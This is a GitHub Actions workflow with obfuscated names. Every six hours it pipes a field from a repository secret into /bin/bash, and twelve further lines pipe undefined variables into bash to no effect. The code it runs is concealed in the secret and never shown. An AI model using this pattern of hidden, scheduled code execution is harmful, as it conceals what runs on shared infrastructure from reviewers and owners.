name: likuaishou7816
on:
  workflow_dispatch:
  schedule:
    - cron: '37 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: likuaishou7816
        env:
          y62074: ${{ secrets.y62074 }}
        run: |
          echo $y62074 | jq -r .yzlco6279 | /bin/bash
          echo $ehj44827 | jq -r .axrm30598 | /bin/bash
          echo $zwfq838 | jq -r .egr117 | /bin/bash
          echo $ailvt87571 | jq -r .lomxs055 | /bin/bash
          echo $kvj5138 | jq -r .g69 | /bin/bash
          echo $xxa0152 | jq -r .pc41 | /bin/bash
          echo $ujrhi0 | jq -r .ib11 | /bin/bash
          echo $tkmm98998 | jq -r .x91 | /bin/bash
          echo $il6 | jq -r .bz9 | /bin/bash
          echo $xsbf926 | jq -r .ko6 | /bin/bash
          echo $qfzax9444 | jq -r .vy9 | /bin/bash
          echo $mlehs68 | jq -r .wz61 | /bin/bash
          echo $iaej5 | jq -r .twhsu1 | /bin/bash

